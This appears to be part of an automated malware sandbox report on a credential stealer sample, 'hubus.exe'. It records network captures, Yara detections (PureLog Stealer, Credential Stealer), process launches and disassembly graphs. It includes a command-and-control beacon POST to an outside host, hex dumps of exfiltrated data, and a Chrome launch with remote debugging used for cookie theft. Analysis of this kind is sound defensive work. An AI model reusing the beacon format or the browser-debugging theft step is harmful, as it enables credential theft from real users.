                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 67 20 1e 26 85 33 b8 06 9e 00 cf 76 23 4f f2 f9 c6 c0 a6 43 d2 f2 48 f2 00 98 b1 f9 46 12 ab 0d 01 92 af 1e 06 84 62 88 02 4e e0 09 62 48 a2 b1 e0 26 ac 80 b3 88 88 19 b3 de 98 50 4e b6 73 99 9a 47 c8 c8 81 0d 9c 01 bb 6d 3c d2 6a a7 f9 ff cb 9d 4f 29 e1 b9 25 72 f8 cc d7 ab 52 ad 9f 3f b3 e6 55 3c 41 69 99 94 c4 d8 e7 ae 9a bb 12 ce 2d 2d 1c 72 2b f9 d0 68 bb 16 f7 0a d4 c6 3a 22 d1 29 95 6a ff f3 93 81 6c 1d 97 51 20 b6 2c 91 2c 02 e3 44 0e f8 ff 8a 22 fa db d7 b6 76 88 56 09 ea 9a 94 8f 09 d5 d2 ea 49 ea 7c b5 db 4d 72 59 e5 ae 9e 31 00 3c 69 61 d1 10 58 a2 68 f2 59 30 08 49 7d 25 09 39 d2 16 20 92 20 78 1b af 32 96 d9 e2 c3 1a 9d 72 79 5a 8c d9 d8 02 51 64 4c eb 0b bb 1e 60 dc aa 04 1c 5b 07 87 c6 a4 05 7e 8f 26 6b 1e 18 d8 5d 09 ab af 4f fd 7d 0a 22
                                                                                                                                                                                                                                                            Data Ascii: g &3v#OCHFbNbH&PNsGm<jO)%rR?U<Ai--r+h:")jlQ ,,D"vVI|MrY1<iaXhY0I}%9 x2ryZQdL`[~&k]O}"
                                                                                                                                                                                                                                                            2024-12-19 23:58:39 UTC15331OUTData Raw: 87 14 0c ef 2d 6d 90 d9 b0 a3 fe 72 09 bb 6f b6 cb 45 d0 51 8c 14 40 f2 40 64 ab 08 83 25 f4 43 ea 71 13 41 cf 6e 1a 13 4c 8f 70 cc a3 d6 06 3b e0 1e 73 c1 4e 53 86 33 a3 7f e3 06 9b e8 34 b3 00 44 ab db 98 6c 78 3a 79 75 5c 53 66 ef f1 e8 31 67 55 05 63 1a 4a ee 32 66 0d 7c 19 5f d7 b1 0f 76 6d 49 78 99 19 b7 33 05 f1 c4 fc 2e b5 5b d5 1c 91 fa 33 92 52 51 d3 fb ea 7c 2c 7b e9 de 8b 3c 94 06 3c 2c b8 f6 bb 1a ae e8 6c ca 70 dc c8 03 52 e7 75 73 4f f6 69 16 a7 ff 39 ec fe f3 92 3a dd ef eb 99 5d 31 47 a1 e1 d9 89 97 95 62 4d c4 97 4a 9c 5b 1d e2 4f c7 f0 46 ba 48 e8 b5 20 7c 82 1d ba 6e 4f 72 c7 16 b1 e2 c4 c6 a7 37 b0 1f 50 d3 96 05 f1 1f 6e 55 3c 0d 46 68 95 39 fa b6 bd d1 13 e6 7d 26 13 39 68 17 02 aa b9 db db 77 a2 7b 49 cf ed e2 4a 8b d3 81 e1 06 d9
                                                                                                                                                                                                                                                            Data Ascii: -mroEQ@@d%CqAnLp;sNS34Dlx:yu\Sf1gUcJ2f|_vmIx3.[3RQ|,{<<,lpRusOi9:]1GbMJ[OFH |nOr7PnU<Fh9}&9hw{IJ
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC1144INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=uha6ljah1b06j1sre0u2h1nbgf; expires=Mon, 14 Apr 2025 17:45:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2Fr00Kkmq8mUU0LhgVh7d1rllB6NculUJM5ClskhWr4NI2pZBVMEH8611Va40Uu%2FmqPXsKkt7gypj6sZDoU4Ty%2B42h38ILDH%2FRItczp4lgpS2kyDK5EbH5%2F7qL1IZa5DAUmI7X%2Bm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57899dfa4575-ATL
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=141288&min_rtt=141195&rtt_var=29932&sent=500&recv=845&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1070403&delivery_rate=27063&cwnd=252&unsent_bytes=0&cid=561ed71efaff46a7&ts=2564&x=0"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.11.2049766104.21.112.14434780C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 83
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 26 68 77 69 64 3d 41 34 33 33 31 41 38 42 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=&hwid=A4331A8BB129FD4CDB71E32F12885CB3
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=t10fhsh58ld219d0ju3qbfhhv3; expires=Mon, 14 Apr 2025 17:45:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI%2F%2FiUWQDOyU72xs1CUBBSO%2Fz3RXmCTesY5WBMQAEevcFON6r0ElS2yPBP9gKjrhdip32U16duvjHFP9hxE4BAvuBciNIaB7GsSWeLEJKBMwDP6J5%2FCK2FafBR3VnXRVSjwEphQI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b579c68a632ec-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135432&min_rtt=135212&rtt_var=28869&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=986&delivery_rate=28175&cwnd=252&unsent_bytes=0&cid=a3c50f656ca59428&ts=565&x=0"
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC146INData Raw: 38 63 0d 0a 30 4a 62 71 68 30 5a 41 31 74 39 6d 68 58 38 32 4a 32 32 33 4d 76 6e 63 68 39 6c 54 46 77 44 4f 4b 73 35 65 36 63 34 61 36 36 75 4c 37 63 6a 79 5a 48 72 30 74 78 4c 78 44 30 55 64 4d 5a 68 75 31 72 66 72 73 43 4e 30 59 62 70 50 76 6a 65 63 2f 6a 53 59 77 37 2f 6d 74 71 67 76 4c 71 4b 41 42 65 6b 50 61 55 73 4a 78 57 32 4b 74 4f 62 33 4a 32 39 30 37 41 62 73 4f 4a 33 73 49 4e 6d 48 38 76 50 49 76 58 63 39 69 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 8c0Jbqh0ZA1t9mhX82J223Mvnch9lTFwDOKs5e6c4a66uL7cjyZHr0txLxD0UdMZhu1rfrsCN0YbpPvjec/jSYw7/mtqgvLqKABekPaUsJxW2KtOb3J2907AbsOJ3sINmH8vPIvXc9iw==
                                                                                                                                                                                                                                                            2024-12-19 23:58:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:18:58:00
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\hubus.exe"
                                                                                                                                                                                                                                                            Imagebase:0xa70000
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5 hash:43F8E85B16887DF9AEE3D896BD1FD7E3
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.11852643145.0000000000A72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.12089048630.0000000005C90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.12074166269.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:18:58:22
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\hubus.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\hubus.exe"
                                                                                                                                                                                                                                                            Imagebase:0xe20000
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5 hash:43F8E85B16887DF9AEE3D896BD1FD7E3
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.12268716447.0000000001594000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:18:58:25
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6ad3d0000
                                                                                                                                                                                                                                                            File size:2'742'376 bytes
                                                                                                                                                                                                                                                            MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:18:58:26
                                                                                                                                                                                                                                                            Start date:19/12/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2720,i,2268975299143198714,4336465224231573627,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2744 /prefetch:3
                                                                                                                                                                                                                                                            Imagebase:0x7ff6ad3d0000
                                                                                                                                                                                                                                                            File size:2'742'376 bytes
                                                                                                                                                                                                                                                            MD5 hash:BB7C48CDDDE076E7EB44022520F40F77
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:10.6%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:13.4%
                                                                                                                                                                                                                                                              Total number of Nodes:67
                                                                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                                                                              execution_graph 38233 5ae0a38 38234 5ae0a7c SleepEx 38233->38234 38236 5ae0adc 38234->38236 38141 5ae1ee0 38142 5ae1ef5 38141->38142 38146 5ae1f20 38142->38146 38151 5ae1f11 38142->38151 38143 5ae1f0b 38147 5ae1f4a 38146->38147 38149 5ae1f84 38147->38149 38156 5ae2418 38147->38156 38148 5ae21c0 38148->38143 38149->38143 38153 5ae1f20 38151->38153 38152 5ae1f84 38152->38143 38153->38152 38155 5ae2418 8 API calls 38153->38155 38154 5ae21c0 38154->38143 38155->38154 38157 5ae243d 38156->38157 38164 5ae2456 38157->38164 38166 5ae34df 38157->38166 38171 5ae27cf 38157->38171 38176 5ae30fe 38157->38176 38181 5ae2a91 38157->38181 38186 5ae2f07 38157->38186 38191 5ae2af6 38157->38191 38196 5ae32ca 38157->38196 38164->38148 38167 5ae34ee 38166->38167 38201 5ae5478 38167->38201 38205 5ae5480 38167->38205 38168 5ae3562 38172 5ae27d9 38171->38172 38209 5ae47d5 38172->38209 38213 5ae47e0 38172->38213 38177 5ae3114 38176->38177 38178 5ae25b9 38176->38178 38217 5ae5058 38177->38217 38221 5ae5050 38177->38221 38182 5ae2a97 38181->38182 38184 5ae47d5 CreateFileA 38182->38184 38185 5ae47e0 CreateFileA 38182->38185 38183 5ae2ad7 38184->38183 38185->38183 38187 5ae2f0f 38186->38187 38225 5ae4c64 38187->38225 38229 5ae4c70 38187->38229 38192 5ae25b9 38191->38192 38193 5ae3115 38191->38193 38194 5ae5058 MapViewOfFile 38193->38194 38195 5ae5050 MapViewOfFile 38193->38195 38194->38192 38195->38192 38197 5ae32d9 38196->38197 38199 5ae5478 VirtualProtect 38197->38199 38200 5ae5480 VirtualProtect 38197->38200 38198 5ae25b9 38199->38198 38200->38198 38202 5ae54c9 VirtualProtect 38201->38202 38204 5ae5536 38202->38204 38204->38168 38206 5ae54c9 VirtualProtect 38205->38206 38208 5ae5536 38206->38208 38208->38168 38210 5ae4842 CreateFileA 38209->38210 38212 5ae4936 38210->38212 38214 5ae4842 CreateFileA 38213->38214 38216 5ae4936 38214->38216 38218 5ae509c MapViewOfFile 38217->38218 38220 5ae5114 38218->38220 38220->38178 38222 5ae5058 MapViewOfFile 38221->38222 38224 5ae5114 38222->38224 38224->38178 38226 5ae4cd2 CreateFileMappingA 38225->38226 38228 5ae4db8 38226->38228 38230 5ae4cd2 CreateFileMappingA 38229->38230 38232 5ae4db8 38230->38232

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 02E50DA0 Relevance: 9.4, Strings: 7, Instructions: 680COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 2e50da0-2e50dd2 2 2e51215-2e51233 0->2 3 2e50dd8-2e50dec 0->3 8 2e51634-2e51640 2->8 4 2e50df3-2e50e76 3->4 5 2e50dee 3->5 31 2e50e82-2e50ed6 4->31 32 2e50e78-2e50e7c 4->32 5->4 9 2e51646-2e5165a 8->9 10 2e51241-2e5124d 8->10 11 2e51624-2e51629 10->11 12 2e51253-2e512d3 10->12 19 2e51631 11->19 33 2e512d5-2e512db 12->33 34 2e512eb-2e51304 12->34 19->8 58 2e51157-2e5117b 31->58 59 2e50edc-2e50ee4 31->59 32->31 35 2e512dd 33->35 36 2e512df-2e512e1 33->36 39 2e51334-2e51372 34->39 40 2e51306-2e5132f 34->40 35->34 36->34 53 2e51374-2e51395 39->53 54 2e51397-2e513a4 39->54 40->19 60 2e513ab-2e513b1 53->60 54->60 70 2e511ff-2e51205 58->70 61 2e50ee6-2e50eea 59->61 62 2e50eeb-2e50ef3 59->62 64 2e513d0-2e51422 60->64 65 2e513b3-2e513ce 60->65 61->62 66 2e50ef5 62->66 67 2e50ef8-2e50f1a 62->67 98 2e5153d-2e5157c 64->98 99 2e51428-2e5142d 64->99 65->64 66->67 76 2e50f1c 67->76 77 2e50f1f-2e50f25 67->77 72 2e51207 70->72 73 2e51212 70->73 72->73 73->2 76->77 80 2e510db-2e510e6 77->80 81 2e50f2b-2e50f45 77->81 84 2e510e8 80->84 85 2e510eb-2e51122 call 2e50138 80->85 82 2e50f85-2e50f8e 81->82 83 2e50f47-2e50f4b 81->83 87 2e50f94-2e50fa4 82->87 88 2e511fa 82->88 83->82 86 2e50f4d-2e50f55 83->86 84->85 129 2e51124-2e5114c 85->129 130 2e5114e 85->130 90 2e50fde-2e51073 86->90 91 2e50f5b 86->91 87->88 92 2e50faa-2e50fbb 87->92 88->70 105 2e51180-2e51194 90->105 106 2e51079-2e5107d 90->106 94 2e50f5e-2e50f60 91->94 92->88 95 2e50fc1-2e50fd1 92->95 100 2e50f65-2e50f70 94->100 101 2e50f62 94->101 95->88 102 2e50fd7-2e50fdc 95->102 133 2e51595-2e515a1 98->133 134 2e5157e-2e51593 98->134 111 2e51437-2e5143a 99->111 100->88 107 2e50f76-2e50f81 100->107 101->100 102->90 105->88 108 2e51196-2e511b0 105->108 106->105 110 2e51083-2e51091 106->110 107->94 113 2e50f83 107->113 108->88 114 2e511b2-2e511cf 108->114 115 2e510d1-2e510d5 110->115 116 2e51093 110->116 117 2e51505-2e5152d 111->117 118 2e51440 111->118 113->90 114->88 119 2e511d1-2e511ef 114->119 115->80 115->81 121 2e51099-2e5109b 116->121 127 2e51533-2e51537 117->127 122 2e51447-2e51473 118->122 123 2e514d7-2e51503 118->123 124 2e514a9-2e514d5 118->124 125 2e51478-2e514a4 118->125 119->88 128 2e511f1 119->128 131 2e510a5-2e510c1 121->131 132 2e5109d-2e510a1 121->132 122->127 123->127 124->127 125->127 127->98 127->111 128->88 129->130 130->58 131->88 135 2e510c7-2e510cf 131->135 132->131 138 2e515aa-2e51609 133->138 134->138 135->115 135->121 146 2e51614-2e51622 138->146 146->19
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'=r$<Z;@$TJBr$Te=r$pAr$r)xI$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2331095733
                                                                                                                                                                                                                                                              • Opcode ID: 02340045bdbbbafcdea5713b1062f1a81303ed8bf9fc2c73819ddfca88ca477c
                                                                                                                                                                                                                                                              • Instruction ID: d24bbec2d9a1b87747b60002532a03b65823e4c23ba8d70ae7cf8a26768e84d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02340045bdbbbafcdea5713b1062f1a81303ed8bf9fc2c73819ddfca88ca477c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7522775A105249FDB15DFA8C984FA9BBB2FF48304F1581A8E50AAB362CB35EC51CF50
                                                                                                                                                                                                                                                              Function 02E5DC48 Relevance: 7.2, Strings: 5, Instructions: 956COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 148 2e5dc48-2e5dc69 149 2e5dc70-2e5dd57 148->149 150 2e5dc6b 148->150 152 2e5dd5d-2e5de9e call 2e5a4f0 149->152 153 2e5e459-2e5e481 149->153 150->149 199 2e5dea4-2e5deff 152->199 200 2e5e422-2e5e44c 152->200 156 2e5eafd-2e5eb06 153->156 158 2e5eb0c-2e5eb23 156->158 159 2e5e48f-2e5e499 156->159 161 2e5e4a0-2e5e594 call 2e5a4f0 159->161 162 2e5e49b 159->162 182 2e5e596-2e5e5a2 161->182 183 2e5e5be 161->183 162->161 184 2e5e5a4-2e5e5aa 182->184 185 2e5e5ac-2e5e5b2 182->185 186 2e5e5c4-2e5e5e4 183->186 188 2e5e5bc 184->188 185->188 190 2e5e644-2e5e6c4 186->190 191 2e5e5e6-2e5e63f 186->191 188->186 211 2e5e6c6-2e5e719 190->211 212 2e5e71b-2e5e75e call 2e5a4f0 190->212 203 2e5eafa 191->203 208 2e5df04-2e5df0f 199->208 209 2e5df01 199->209 213 2e5e456 200->213 214 2e5e44e 200->214 203->156 210 2e5e337-2e5e33d 208->210 209->208 215 2e5df14-2e5df32 210->215 216 2e5e343-2e5e3bf call 2e50138 210->216 243 2e5e769-2e5e772 211->243 212->243 213->153 214->213 218 2e5df34-2e5df38 215->218 219 2e5df89-2e5df9e 215->219 259 2e5e40c-2e5e412 216->259 218->219 222 2e5df3a-2e5df45 218->222 224 2e5dfa5-2e5dfbb 219->224 225 2e5dfa0 219->225 226 2e5df7b-2e5df81 222->226 230 2e5dfc2-2e5dfd9 224->230 231 2e5dfbd 224->231 225->224 234 2e5df47-2e5df4b 226->234 235 2e5df83-2e5df84 226->235 232 2e5dfe0-2e5dff6 230->232 233 2e5dfdb 230->233 231->230 239 2e5dffd-2e5e004 232->239 240 2e5dff8 232->240 233->232 237 2e5df51-2e5df69 234->237 238 2e5df4d 234->238 242 2e5e007-2e5e072 235->242 244 2e5df70-2e5df78 237->244 245 2e5df6b 237->245 238->237 239->242 240->239 246 2e5e074-2e5e080 242->246 247 2e5e086-2e5e23b 242->247 249 2e5e7d2-2e5e7e1 243->249 244->226 245->244 246->247 257 2e5e23d-2e5e241 247->257 258 2e5e29f-2e5e2b4 247->258 250 2e5e774-2e5e79c 249->250 251 2e5e7e3-2e5e86b 249->251 252 2e5e7a3-2e5e7cc 250->252 253 2e5e79e 250->253 286 2e5e996-2e5e9a2 251->286 252->249 253->252 257->258 265 2e5e243-2e5e252 257->265 263 2e5e2b6 258->263 264 2e5e2bb-2e5e2dc 258->264 261 2e5e414-2e5e41a 259->261 262 2e5e3c1-2e5e409 259->262 261->200 262->259 263->264 266 2e5e2e3-2e5e302 264->266 267 2e5e2de 264->267 269 2e5e291-2e5e297 265->269 274 2e5e304 266->274 275 2e5e309-2e5e329 266->275 267->266 272 2e5e254-2e5e258 269->272 273 2e5e299-2e5e29a 269->273 276 2e5e262-2e5e283 272->276 277 2e5e25a-2e5e25e 272->277 280 2e5e334 273->280 274->275 278 2e5e330 275->278 279 2e5e32b 275->279 282 2e5e285 276->282 283 2e5e28a-2e5e28e 276->283 277->276 278->280 279->278 280->210 282->283 283->269 288 2e5e870-2e5e879 286->288 289 2e5e9a8-2e5e9f4 286->289 290 2e5e882-2e5e98a 288->290 291 2e5e87b 288->291 298 2e5e9f6-2e5ea1a 289->298 299 2e5ea1c-2e5ea37 289->299 300 2e5e990 290->300 291->290 292 2e5e8f4-2e5e925 291->292 293 2e5e927-2e5e958 291->293 294 2e5e8be-2e5e8ef 291->294 295 2e5e888-2e5e8b9 291->295 292->300 293->300 294->300 295->300 302 2e5ea40-2e5eac4 298->302 299->302 300->286 308 2e5eacb-2e5eaeb 302->308 308->203
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.12073901155.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e50000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: TJBr$Te=r$`*#o$pAr$xb@r
                                                                                                                                                                                                                                                              • API String ID: 0-2592614037
                                                                                                                                                                                                                                                              • Opcode ID: 0e2f03866ddb61b3c6eb15ac426636a432b851c9fdcbd5f2d4aa6e845321b45e
                                                                                                                                                                                                                                                              • Instruction ID: dbbcf511565018af9af57d615482f7b284c684cee2d1334c1cd7d1fb795f1cff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e2f03866ddb61b3c6eb15ac426636a432b851c9fdcbd5f2d4aa6e845321b45e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA2A575A00628CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB361DB319E81CF40
                                                                                                                                                                                                                                                              Function 05A80040 Relevance: 3.8, Strings: 2, Instructions: 1335COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
